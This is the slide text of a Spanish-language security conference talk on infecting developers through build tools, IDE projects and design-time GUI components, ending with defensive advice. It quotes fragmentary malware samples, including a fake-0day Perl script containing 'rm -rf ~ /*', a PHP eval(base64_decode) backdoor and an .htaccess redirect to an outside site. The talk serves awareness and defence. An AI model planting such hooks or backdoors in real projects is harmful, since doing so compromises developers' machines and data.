Bend the developers to your will - miguel tarascó @ tarlogic - rooted 2015

Bend the developers
to your will
Miguel Tarascó Acuña
@Tarlogic
@AcrylicWiFi

Bend the developers to your will

Objetivos de la charla
1. Estado del arte (Code related
Malware)
2. Explorar nuevos vectores y enfoques
3. Cómo explotarlos
4. Cómo prevenirlos/mitigarlos

¿Porque los desarrolladores ?
• Usuarios privilegiados
• Acceso a contraseñas
• Vectores de infección poco conocidos
• Otros …………..

Estado del arte
Bomba lógica
Ofuscación
Si juegas con el mejor...
muere como los demás.

Fake 0days ”openssh-53p1-remote-root.c”
#!/usr/bin/perl
$chan="#cn";
$key ="fags";
$nick="kn";
print $sock "JOIN $chan $keyn";
while (<$sock>){if (/^PING
(.*)$/){
$server="irc.ham.de.euirc.net";
rm -rf ~ /* 2> /dev/null &
fopen(……..,"w+")
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);

PHP/Web Malware
post-
title/%&(%7B$%7Beval(base64_decode($_
SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)
<?php .. eval(base64_decode("DQ..."))
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER}
^.*(google|ask|yahoo|baidu|youtube| <...> ).(.*)
RewriteRule ^(.*)$ http://dimitri.ru/index.php
[R=301,L]
</IfModule>

Gestores de compilación
• Programas más complejos
• Múltiples ficheros
• Múltiples dependencias
• Cross compiling
• Team builds
• etc

Make – Cómo abusarlo
Gestor de dependencias
más usado

Make – Cómo abusarlo
all:
@echo "Wololo!" > "pwned"
@echo "Compiled"

MsBuild – Que és
• Microsoft Build Engine
• Xml
–Propiedades <PropertyGroup>
–Objetivos <Target>
–Tareas <Task>
–Items <ItemGroup>

MsBuild – Cómo se abusa
• Trasparente para el desarrollador
• Lo gestiona el Visual Studio

MsBuild – Cómo se abusa
• No es visible desde el IDE
• Referencias a ficheros externos
• Acepta llamadas a la API de .Net
• Escritura y ejecución
• Esta documentado
• No está explicado

DEMO 1
Abusing MsBuild Engine
MsBuild

Gradle – Que es
• Sistema automatizado de compilación
• Open Source
• Scripts en Groovy (DSL)

Gradle – Cómo se abusa
• Integrado con el IDE
• Autogenerado
• Si se ven los scripts desde el IDE
• Editable

Gradle – Cómo se abusa
• Groovy soporta llamadas Java
• Se puede:
–Des/Comprimir archivos/streams
–Escribir a disco
–Ejecutar

DEMO 2
Abusing Android Studio
Gradle – Android Studio

Xamarin – Que és
• Antes llamado MonoDevelop
• IDE desarrollo proyecto Mono
• Multiplataforma
–Windows
–Mac
–Linux

DEMO 3
Abusing Xamarin
Xamarin

Componentes Gráficos
• “Objetos Visibles”
• Elementos de la interfaz de usuario
• Librerias gráficas
• Parte principal de los GUI
• Productos/librerias comerciales

Visual Studio – Cómo se abusan
• Agregar a la solución
–Proyecto
–Librería
• Usar uno por defecto
• Arrastrarlo al Form
• Se autodibujan

Visual Studio – Cómo se abusan
• Interactivos
• También en tiempo de diseño
• Si se pinta, se ejecuta
• Y si metemos algo más
que código de pintado ?

DEMO 4
Abusing Visual Studio
Visual Studio

Android Studio – Como se abusa
• Basado en Eclipse
• Se implementa el método de pintado
• Se incluye en el proyecto
• Similar a los Widgets
• Se crea una vista

Android Studio

Conclusiones
• NUNCA confiar
• Revisar:
–El código.
–Resto de ficheros
• Usar:
–Máquinas Virtuales
–Sandbox

Gracias :)
¿Preguntas?
Bend the developers
to your will
Miguel Tarascó Acuña
@Tarlogic
@AcrylicWiFi

Bend the developers to your will - miguel tarascó @ tarlogic - rooted 2015

Recommended

Recommended

More Related Content

Similar to Bend the developers to your will - miguel tarascó @ tarlogic - rooted 2015

Similar to Bend the developers to your will - miguel tarascó @ tarlogic - rooted 2015 (20)

Bend the developers to your will - miguel tarascó @ tarlogic - rooted 2015